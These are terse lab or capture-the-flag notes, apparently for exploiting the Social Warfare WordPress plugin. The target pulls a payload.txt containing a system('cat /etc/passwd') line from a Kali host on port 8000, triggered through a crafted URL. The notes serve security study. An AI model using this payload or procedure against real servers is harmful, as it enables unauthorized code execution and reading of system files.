Social Warfare
Read /etc/passwd
Last updated
Read /etc/passwd
Last updated
[1]Git clone the exploit
sudo git clone
[2]Craft a payload.txt and serve on port 8000 using python
<pre>system('cat /etc/passwd')</pre>
[3] Craft malicious url
Target : 192.168.101.174
Kali: 192.168.101.169:8000
3) Trigger in browser and read /etc/passwd content